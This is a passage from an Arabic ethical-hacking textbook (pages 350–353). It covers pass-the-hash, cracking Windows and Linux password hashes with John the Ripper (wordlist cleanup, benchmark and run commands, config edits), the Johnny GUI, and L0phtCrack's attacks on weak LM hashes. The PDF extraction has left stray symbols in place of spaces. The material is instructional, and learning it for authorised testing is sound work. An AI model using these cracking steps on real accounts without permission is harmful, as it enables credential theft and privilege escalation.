‫اﻟﻛﺛﯾر ﻣن ھذه اﻟﮭﺟﻣﺎت وﻟﻛﻧﮭﺎ ﻣﺎ زاﻟت ﺗﻌﻣل ﺿد أﻧظﻣﺔ وﯾﻧدوز ‪ .XP‬ﻟﻛن إذا ﺗم ﺗﻌطﯾل ‪ ،UAC‬ﻛﻣﺎ ﺳﻧرى ﻻﺣﻘﺎ‪ ،‬ﻓﯾﻣﻛﻧﮭﺎ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪.‬‬

‫ﻟﻛﻧﮫ ﻻ ﯾزال ﻣن اﻟﻣﻔﯾد إﻟﻘﺎء ﻧظرة ﻋﻠﻰ ﺑﻌض ﻣن ﺗﻘﻧﯾﺎت ‪.Pass the Hash‬‬
‫‪Passing the Hash with Metasploit Psexec‬‬
‫‪ Psexec‬رﺑﻣﺎ ﻛﺎن واﺣدا ﻣن اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ ‪ Pass the Hash‬ﻟﺳﻧوات ﻋده‪ .‬وﯾﺗم ﺗﻧﻔﯾذه ﻣن ﺧﻼل وﺟود ﺟﻠﺳﺔ ﻋﻣل ﺑﻌﯾدة وﻧﺷطﺔ‬
‫ﻣن ﺧﻼل ‪ .Meterpreter‬ﺳوف ﯾﺷرح ﻻﺣﻘﺎ‪.‬‬
‫‪Passing the Hash Toolkit‬‬
‫ھﻲ ﻋﺑﺎره ﻋن ﻣﺟﻣوﻋﺔ أدوات ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ ،‬واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﻻﺳﺗﺧدام اﻟﮭﺎش ﻷداء وظﺎﺋف ﻣﺧﺗﻠﻔﺔ‪ .‬وأﺿﯾف ﻣؤﺧرا إﻟﻰ‬
‫ﻛﺎﻟﻲ وﯾﻣﻛن ﻓﺗﺢ ﻣن اﻟﻘﺎﺋﻣﺔ‪:‬‬
‫‪Kali Linux/Password Attacks/Passing the Hash‬‬
‫ﯾﻣﻛﻧك اﺳﺗﺧدام اﻷواﻣر ﻟﻠﻘﯾﺎم ﺑﺑﻌض اﻷﻣور اﻟﻣﺛﯾرة ﻟﻼھﺗﻣﺎم ﺟدا‪ .‬ﻧﺣن ﻟن ﻧﻐطﻲ اﻷﻣر‪ ،‬وﻟﻛن اﻟﻛﺛﯾر ﻣﻧﮭم ﻗد ﺗﺑدو ﻣﺗﺷﺎﺑﮭﺔ ﻟﻣﺳﺗﺧدﻣﻲ‬
‫وﯾﻧدوز‪ .‬ﻣﺟرد اﺳﺗﺧدام اﻟﺗﻌﺑﯾر )‪ (--help‬وﺳﺗﺣﺻل ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣﺳﺎﻋدة ﻣن ﺧﯾﺎرات اﻟﻣﮭﻣﺔ وﯾﺳﺗﺧدم‪:‬‬

‫‪JTR (John the Ripper): King of the Password Crackers‬‬


‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن‪ .‬ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول‬
‫اﻟﻰ ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬
‫إذا ﻛﻧت ﻧﺳﺗطﯾﻊ اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف‪ ،‬ﻓﺎن ھﻧﺎك اﺣﺗﻣﺎﻻت ﺟﯾدة ﻣﻊ ﻣﺎ ﯾﻛﻔﻲ ﻣن اﻟوﻗت‪ ،JTR ،‬أداة ﻟﻛﺳر‬
‫ﻛﻠﻣﺔ اﻟﺳر‪ ،‬ﺣﯾث ﯾﻣﻛﻧﮫ اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪350‬‬

‫‪ John the Ripper‬ھﻲ اﻛﺛر اداه ﺷﻌﺑﯾﮫ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺳﺗﺧدﻣﺔ اﻟﯾوم‪ .‬ﺣﯾث ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭﺎ ﺑﻛﺳر أﻧواع‬
‫ﻣﺧﺗﻠﻔﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة واﻟﮭﺎش‪ John the Ripper .‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻻﻛﺗﺷﺎف اﻟﺗﻠﻘﺎﺋﻲ ﻟﻣﻌظم‬
‫اﻟﮭﺎﺷﺎت وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة ﻟﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻣﺧﺗﺑر اﻻﺧﺗراق‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﻔﺿﻠون ﻣﺛل ھذه اﻷداة ﻷﻧﮭﺎ ﻗﺎﺑﻠﺔ ﻟﻠﺗﺧﺻﯾص‬
‫وﯾﻣﻛن اﻋدادھﺎ ﻣﻊ ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻟﺗﺳرﯾﻊ ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪ John the Ripper‬ﯾﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬


‫‪ -‬ﺗﺣﺎول ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻣﻊ ﻛﻠﻣﺎت اﻟﻘﺎﻣوس)‪. (Dictionary words‬‬
‫‪ -‬ﯾﻘوم ﺑﺈﺿﺎﻓﺔ ﺑﻌض اﻟﺣروف اﻷﺑﺟدﯾﺔ واﻟرﻗﻣﯾﺔ اﻟﻰ ﻛﻠﻣﺎت اﻟﻘﺎﻣوس‪.‬‬
‫‪ -‬ﯾﺿﻊ ﻛﻠﻣﺎت اﻟﻘﺎﻣوس ﻣﻌﺎ‪.‬‬
‫‪ -‬ﯾﺿﯾف أﺣرف أﺑﺟدﯾﺔ ورﻗﻣﯾﺔ ﻟﺟﻣﻊ اﻟﻛﻠﻣﺎت‪.‬‬
‫‪ -‬ﺗﺷﻐﯾل اﻟﻛﻠﻣﺎت اﻟﻘﺎﻣوس ﻣﻊ أﺣرف ﺧﺎﺻﺔ ﻣﺧﺗﻠطﺔ‪.‬‬
‫‪ -‬ﻋﻧد ﻓﺷل ﻛل ﻣﻣﺎ ﺳﺑﻖ‪ ،‬ﯾﺣﺎول ﺗﺷﻐﯾل اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪.(brute-force‬‬

‫ﻋﻧد اﺳﺗﺧدام ھذه اﻷداة ﻓﺎن اول ﺷﻲء ﺗﻔﻌﻠﮫ ھو ﺗﺣدﯾث اﻟﻘﺎﻣوس اﻻﻓﺗراﺿﻲ‪ .‬ﺣﯾث اﻧﻧﺎ وﺟدﻧﺎ ان ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻻﻓﺗراﺿﯾﺔ ﻣﺣدودة )ﺣواﻟﻲ‬
‫‪ 3115‬ﻛﻠﻣﺔ( وإﻧﮭﺎ ﻓﻲ ﻛﺛﯾر ﻣن اﻟﺣﺎﻻت ﻻ ﺗﻘوم ﺑﻛﺳر ﻛﻠﻣﺎت اﻟﺳر اﻟﺷﺎﺋﻌﺔ‪ .‬ﯾﻣﻛﻧك أن ﺗﺟد ﻣﻠﻔﺎت اﻟﻘواﻣﯾس ﻣن ﺧﻼل ﺑﺣث ﺟوﺟل‪ .‬ﻟﻠﺗﺣﻘﻖ‬
‫ﻣن ﺣﺟم ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺟدﯾدة‪ ،‬ﻧﻘوم ﺑﻔﺗﺢ اﻟﺗرﻣﻧﺎل وإﺻدار اﻷﻣر ‪ ،word count‬ﺣﺎﻟﻣﺎ ﯾﺗم ﺗﺣﻣﯾل اﻟﻣﻠف إﻟﻰ اﻟﻣﺟﻠد اﻟﻧﺷط‪ .‬ﻧﻘوم ﺑﺎﺳﺗﺧدام‬
‫ھذا اﻷﻣر ‪.wc –l FILNAME‬‬
‫ﻣن اﻟﺷﺎﺋﻊ أن ﯾﻛون ھﻧﺎك ﻋﺑﺎرات ﻣﻛررة ﻋﻧد اﻟﺗﺣﻣﯾل واﻟﺟﻣﻊ ﺑﯾن ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﻣﺗﻌددة ﻣن اﻹﻧﺗرﻧت‪ .‬ﻣن اﻟﻣﺳﺗﺣﺳن إزاﻟﺔ ھذه اﻟﺗﻛرارات‬
‫وﻛذﻟك اﻷﺣرف اﻟﻛﺑﯾرة ﺣﯾث ﯾﻘوم ‪ JTR‬ﺑﺗﺑدﯾل أﻧﻣﺎط اﻟﺣروف ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬
‫‪ -‬ﻣﺛﺎل ﻋﻠﻰ اﻷﻣر اﻟﻣﺳﺗﺧدم ﻹزاﻟﺔ اﻟﻛﻠﻣﺎت اﻟﻛﺑﯾرة ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#tr©A-Z©a-z©<©Word_File©>©All_Lower_Case_File‬‬
‫‪ -‬ﻣﺛﺎل ﻋﻠﻰ اﻷﻣر اﻟﻣﺳﺗﺧدم ﻹزاﻟﺔ اﻟﺗﻛرارات ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#sort©-u©AllL_ower_Case_File©>©No_Duplicates_File‬‬

‫ﻟﻔﺗﺢ ‪ John the Ripper‬ﻓﻲ ﻛﺎﻟﻲ‪ ،‬ﻧذھب اﻟﻰ اﻻﺗﻲ‪:‬‬


‫‪Password Attacks | Offline Attacks | John‬‬

‫ﻣن أﺟل اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ ﻣرور‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﺑﻌض ﻣن اﻟﺧطوات اﻟﻣﮭﻣﺔ‪ .‬ﻋﻠﯾﻧﺎ أوﻻ ﺗﺣدﯾد ﺧوارزﻣﯾﺔ اﻟﮭﺎش‪ ،‬ﺛﺎﻧﯾﺎ‬
‫ﻧﺧﺗﺎر ﻛﻠﻣﺔ ﻣرور ﻋﺎدﯾﮫ‪ ،‬ﺛﺎﻟﺛﺎ ﻧﻘوم ﺑﺗﺷﻔﯾر ﻛﻠﻣﺔ اﻟﻣرور اﻟذي اﺧﺗرﻧﮭﺎ ﻣﻊ ﺧوارزﻣﯾﺔ اﻟﮭﺎش‪ ،‬وأﺧﯾرا ﻧﻘﺎرن ھﺎش اﻟﻛﻠﻣﺔ اﻟﺗﻲ اﺧﺗرﻧﺎھﺎ ﻣﻊ ﻣن‬
‫اﻟﮭﺎش اﻟﮭدف‪ .‬إذا ﺗطﺎﺑﻘﺎ‪ ،‬ﻓﻧﺣن ﻧﻌﻠم أﻧﮭﺎ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻌﺎدﯾﺔ ﻷﻧﮫ ﻻ ﯾوﺟد ﻧﺻﯾن ﻋﺎدﯾﯾن ﻣﺧﺗﻠﻔﯾن ﯾﻌطﯾﺎ ﻧﻔس اﻟﮭﺎش‪.‬‬
‫ﻋﻠﻰ اﻟرﻏم ﻣن أن ھذا ﻗد ﯾﺑدو وﻛﺄﻧﮭﺎ ﻋﻣﻠﯾﺔ ﺧرﻗﺎء‪ ،‬أو ﺑطﯾﺋﺔ ﻟﻺﻧﺳﺎن‪ ،‬ﻓﺄن اﻟﺣواﺳﯾب ﻣﺗﺧﺻﺻﺔ ﻓﻲ ﻣﮭﺎم ﻣﺛل ھذا‪ .‬ﻧظرا ﻟﻘوة اﻟﺣوﺳﺑﺔ‬
‫اﻟﻣﺗﺎﺣﺔ اﻟﯾوم‪ ،‬واﻟﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ ﻣن أرﺑﻊ اﻟﺧطوات اﻟﻣذﻛورة أﻋﻼه ھﻲ ﺗﺎﻓﮭﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻶﻻت اﻟﺣدﯾﺛﺔ‪ .‬اﻟﺳرﻋﺔ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ‪ JTR‬ﻓﻲ ﺗوﻟد ھﺎش‬
‫ﻛﻠﻣﺎت اﻟﻣرور ﺗﺧﺗﻠف ﺗﺑﻌﺎ ﻟﻠﺧوارزﻣﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻹﻧﺷﺎء اﻟﮭﺎش واﻷﺟﮭزة اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾل ‪ JTR‬ﻋﻠﯾﮭﺎ‪ .‬ﻓﻣن اﻟﻣﺄﻣون اﻟﻘول إﻧﮫ ﺣﺗﻰ ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر ﻣﺗوﺳط ﻗﺎدر ﻋﻠﻰ ﺗوﻟﯾد اﻟﻣﻼﯾﯾن ﻣن ﺗﺧﻣﯾن ﻟﻛﻠﻣﺎت ﻣرور اﻟوﯾﻧدوز )‪ (LM‬ﻓﻲ ﻛل ﺛﺎﻧﯾﺔ‪ .‬ﯾﺗﺿﻣن ‪ JTR‬ﻣﯾزة أﻧﯾﻖ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك‬
‫ﻟﻘﯾﺎس أداء اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ .‬ﺳﯾﺗم ﻗﯾﺎس ھذا اﻟﻣﻌﯾﺎر ﻓﻲ )‪ .cracks per second (c/s‬ﯾﻣﻛﻧك ﺗﺷﻐﯾل ھذا ﻋن طرﯾﻖ ﻓﺗﺢ اﻟﺗرﻣﻧﺎل ﻓﻲ‬
‫ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس وﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#john --test‬‬
‫ھذا ﺳوف ﯾوﻓر ﻟك ﻗﺎﺋﻣﺔ ﻣن ﻣﻘﺎﯾﯾس اﻷداء وﺗﺗﯾﺢ ﻟك ﻣﻌرﻓﺔ ﻣدى ﻛﻔﺎءة اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻓﻲ ﺗوﻟﯾد اﻟﺗﺧﻣﯾﻧﺎت اﻟﺗﻲ ﺗﺳﺗﻧد إﻟﻰ اﻷﺟﮭزة‬
‫اﻟﺧﺎﺻﺔ ﺑك واﻟﺧوارزﻣﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻟﮭﺎش ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫ﻻﺳﺗﺧدام ﻣﻠف اﻟﻛﻠﻣﺎت اﻟﻣﺧﺻص ﻣﺛل اﻟﻣﻠف اﻟذي ﻗﻣت ﺑﺑﻧﺎﺋﮫ ﻓﻲ اﻟﻣﺛﺎل اﻟﺳﺎﺑﻖ واﻟذي ﯾﺳﻣﻰ ‪ ،No_Duplicates_File‬واﻟﺗﻲ ﺳوف‬
‫ﺗﺣﺗﺎﺟﮫ ﻟﺗﺣرﯾر ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻻﻓﺗراﺿﯾﺔ‪ .‬وﯾﻣﻛن ﻓﻌل ھذا ﻣن ﺧﻼل ﺗﻌدﯾل اﻟﺳطر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﻣﻠف )‪.(/etc/john/john.conf‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪351‬‬

‫ﻓﻲ ھذا اﻟﻣﻠف‪ ،‬ﺳوف ﻧﺟد أﻧﮫ ﯾﺷﯾر اﻟﻰ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت ‪ passwords.lst‬اﻓﺗراﺿﯾﺎ‪ .‬وﻟﺗﻐﯾﯾر ھذه اﻟﻼﺋﺣﺔ ﺑﻼﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺗﻲ اﻋددﺗﮭﺎ ﺳﺎﺑﻘﺎ‬
‫ﻧﻘوم ﺑﺗﺑدﯾل اﻟﺳطر )‪ (Wordlist = $JOHN/password.lst‬اﻟﻰ )‪ .(Wordlist = No_Duplicates_File.lst‬ﺛﺎﻧﯾﺎ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت‬
‫اﻟﺗﻲ ﻗﻣت ﺑﺈﻧﺷﺎﺋﮭﺎ ‪ No_Duplicates_File.lst‬ﯾﺟب أن ﯾﻛون ﻣوﺟودة ﻓﻲ اﻟﻣﺟﻠد اﻟﻣﺣدد ﻓﻲ اﻟﻣﻠف ‪ .john.conf‬او ﯾﻣﻛن ذﻟك ﺑﺎﺳﺗﺧدام‬
‫اﻟﺗﻌﺑﯾر)‪ (--wordlist‬ﺛم ﻣﻛﺎن اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت‪ .‬ﻻﺳﺗﺧدام ‪ John the Ripper‬ﻋﻠﻰ ﻣﻠف ﻛﻠﻣﺔ اﻟﺳر‪ ،‬ﻓﺳوف‬
‫ﻧﺣﺗﺎج أوﻻ إﻟﻰ ﻧﺳﺦ اﻟﻣﻠف إﻟﻰ اﻟﻣﺟﻠد ‪ john‬واﻟﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر )‪ .(/root/.john/‬ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ John the Ripper‬ﻋﻠﻰ‬
‫طرﯾﻖ اﻻﺗﻲ‪.‬‬
‫‪#john©hash‬‬

‫ﻟرؤﯾﺔ ﻧﺳﺑﺔ ﺗﻘد ھذا اﻻﻣر ﻓﻲ ﻋﻣﻠﮫ ﻋن طرﯾﻖ اﻟﻧﻘر ﻓوق ‪.Enter‬‬
‫ﻟﻠﺣﺻول ﻋﻠﻰ ھذه اﻷداة ﻟﻠﻌﻣل ﻓﻲ ﺑﯾﺋﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز أو ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﯾﻣﻛﻧك زﯾﺎرة اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.openwall.com/‬‬
‫‪Johnny‬‬

‫‪ Johnny‬ھﻲ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ﻟﻠﺗطﺑﯾﻖ ‪ John the Ripper‬ذات اﻟﺷﻌﺑﯾﺔ اﻟﻛﺑﯾرة ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ ﻣرور ﻟﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪.‬‬
‫وھﻲ ﻣﺛل إﺻدار ﺳطر اﻷواﻣر‪ Johnny ، John the Ripper‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮫ ﺑﺎﺗﺧﺎذ اﺟراءات ﻷﻧواع ﻣﺧﺗﻠﻔﺔ‬
‫ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة واﻟﮭﺎش‪ Johnny .‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟﻛﺷف اﻷﻟﻰ ﻟﻣﻌظم اﻟﮭﺎﺷﺎت وﻛﻠﻣﺎت اﻟﺳر‬
‫اﻟﻣﺷﻔرة‪ ،‬ﻣﻣﺎ ﯾﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻣﺧﺗﺑر اﻻﺧﺗراق‪.‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ﯾوﺟد ﺑﻌد اﻟﺗﺧﺻﯾﺻﺎت اﻟﻣﺗوﻓرة ﻓﻲ ﻧﺳﺧﺔ ﺳطر اﻷواﻣر ‪ John the Ripper‬ﻏﯾر ﻣﺗوﻓرة ﻓﻲ اﻟﺗطﺑﯾﻖ ‪ Johnny‬ﻟذﻟك ﯾﻔﺿل‬
‫اﺳﺗﺧدام ﻧﺳﺧﺔ ﺳر اﻷواﻣر‪.‬‬

‫ﻻﺳﺗﺧدام ‪ Johnny‬ﻧﺗﺑﻊ اﻻﺗﻲ‪:‬‬


‫‪Password Attacks | Offline Attacks and select Johnny‬‬
‫واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪352‬‬

‫ﻣن ﺧﻼل ھده اﻟﺷﺎﺷﺔ ﻣن ﻗﺎﺋﻣﺔ اﻷدوات اﻟﻌﻠوﯾﺔ ﻧﻧﻘر ﻓوق ‪ Open password file‬واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﻧﺿﺢ اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش‬
‫اﻟذي ﻧرﯾد ﻓك ﺗﺷﻔﯾره اﻟﻰ ﻛﻠﻣﺎت ﻣرور واﺿﺣﺔ‪.‬‬

‫ﻣن ﺧﻼل ھذا اﻟﺗطﺑﯾﻖ ﻧﻼﺣظ وﺟود ﺷرﯾط أدوات ﻗﺎﺋﻣﻲ ﻋﻠﻰ اﻟﺟﺎﻧب اﻷﯾﻣن ﻋﻧد اﻟﻧﻘر ﻓوق ‪ Options‬واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﻧﺣدد ﻧوﻋﮫ اﻟﮭﺟوم‬
‫ﻟﻛﺳر ھﺎش ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫ﻧﺗﺎﺋﺞ ھذا اﻟﺗطﺑﯾﻖ ﺗﺣﻣل ‪ %90‬ﻧﺗﺎﺋﺞ ﺻﺣﯾﺣﮫ‪.‬‬

‫ﻧﻼﺣظ ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ ‪ wordlist mode‬اﻧﮫ ﯾﻣﻛﻧك اﺧﺗﯾﺎر ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗرﯾدھﺎ‪.‬‬

‫‪L0phtCrack‬‬
‫اﻟﻣﺻدر‪http://www.l0phtcrack.com :‬‬
‫‪ L0phtCrack‬ھﻲ أداة ﻣﺻﻣﻣﺔ ﻟﺗدﻗﯾﻖ ﻛﻠﻣﺔ اﻟﻣرور واﺳﺗﻌﺎدة اﻟﺗطﺑﯾﻘﺎت‪ .‬ﯾﺗم اﺳﺗﺧداﻣﮫ ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻔﻘودة ﻟﻣﺎﯾﻛروﺳوﻓت‬
‫وﯾﻧدوز ﺑﻣﺳﺎﻋدة ‪ ،rainbow table ،hybrid ،dictionary‬و‪ brute force attacks‬وﯾﺗم اﺳﺗﺧداﻣﮫ أﯾﺿﺎ ﻟﻠﺗﺣﻘﻖ ﻣن ﻗوة ﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬اﻟﻌﯾوب اﻷﻣﻧﯾﺔ اﻟﺗﻲ ھﻲ ﻣﺗﺄﺻﻠﺔ ﻓﻲ ﻧظﺎم اﻟﺗوﺛﯾﻖ ﻟﻛﻠﻣﺔ اﻟﺳر وﯾﻧدوز ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺳﮭوﻟﺔ ﻣﻊ ﻣﺳﺎﻋدة ﻣن ‪.L0phtCrack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪353‬‬

‫أﻧظﻣﺔ اﻟﺗﺷﻐﯾل وﯾﻧدوز‪ ،‬اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ أﺳﺎس اﻟﺑروﺗوﻛول ‪ ،LAN Manager networking protocols‬ﺗﺳﺗﺧدم ﻧظﺎم اﻟﻣﺻﺎدﻗﺔ اﻟذي‬
‫ﯾﺗﻛون ﻣن ‪ 8‬ﺑﺎﯾت ﻣن اﻟﺗوﺛﯾﻖ )‪ (challenge‬واﻟﺗﻲ ﺗﻘوم ﺑﺈرﺟﺎع ‪ 24‬ﺑﺎﯾت ﻣن اﻻﺳﺗﺟﺎﺑﺔ )‪ (response‬ﻋﺑر اﻟﺷﺑﻛﺔ ﻣن اﻟﻌﻣﯾل إﻟﻰ اﻟﺧﺎدم‬
‫ﻓﻲ اﻟﺷﻛل ‪ .challenge/response format‬ﯾﻘوﻣﺎ اﻟﺧﺎدم ﺑﻣﻘﺎرﻧﺔ اﻻﺳﺗﺟﺎﺑﺔ )‪(response‬ﻣﻘﺎﺑل ‪ 24‬ﺑﺎﯾت ﻣن اﻻﺳﺗﺟﺎﺑﺔ اﻟﻣﺗوﻗﻌﺔ‬
‫)‪ (response‬اﻟﺧﺎﺻﺔ ﺑﮫ اﻟذي ﻗﺎﻣﺎ ھو ﺑﺣﺳﺎﺑﮭﺎ وﻧﺗﺎﺋﺞ اﻟﻣﻘﺎرﻧﺔ ھو اﻟﻣﺻﺎدﻗﺔ‪ .‬ﺣﯾث ﺗﻘوم اﻟﺧوارزﻣﯾﺔ ﺑﺗﻘﺳﯾم ﻛﻠﻣﺔ اﻟﻣرور إﻟﻰ ﻗطﺎﻋﯾن‬
‫ﻣﻧﻔﺻﻠﯾن ﻣﻛون ﻣن ﺳﺑﻌﺔ أﺣرف ﺛم اﻟﻘﯾﺎم ﺑﺎﻟﮭﺎش ﻟﻛل ﻗطﺎع ﺑﺷﻛل ﻓردي‪ .‬وھذا ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﻘﯾﯾد ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر إﻟﻰ ﺳﺑﻌﺔ أﺣرف‪،‬‬
‫وﯾﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل‪ .‬ﺿﻌف ھﺎش ﻛﻠﻣﺔ اﻟﺳر‪ ،‬إﻟﻰ ﺟﺎﻧب اﻧﺗﻘﺎل اﻟﮭﺎش ﻋﺑر اﻟﺷﺑﻛﺔ ﻓﻲ ﺷﻛل اﻟﺗوﺛﯾﻖ‪/‬اﻻﺳﺗﺟﺎﺑﺔ‪ ،‬ﯾﺟﻌل اﻟﻧظم اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ‬
‫‪ LM‬ﻋرﺿﺔ ﻟﻼﻋﺗراض ﺗﻠﯾﮭﺎ ھﺟﻣﺎت ‪ dictionary‬و‪ brute-force‬ﺑواﺳطﺔ ‪L0phtCrack 6. L0phtCrack‬ﻟدﯾﮫ ﻗدره ﻣدﻣﺟﺔ‬
‫ﻋﻠﻰ اﺳﺗﯾراد ﻛﻠﻣﺎت اﻟﺳر ﻣن وﯾﻧدوز ﻋن ﺑﻌد‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻹﺻدارات ‪-64‬ﺑت ﻣن وﯾﻧدوز ﻓﯾﺳﺗﺎ ‪ ،‬وﯾﻧدوز ‪ ،7‬وآﻻت ﯾوﻧﻛس ‪ ،‬دون اﻟﺣﺎﺟﺔ‬
‫إﻟﻰ أداة ﺧﺎرﺟﯾﺔ‪.‬‬

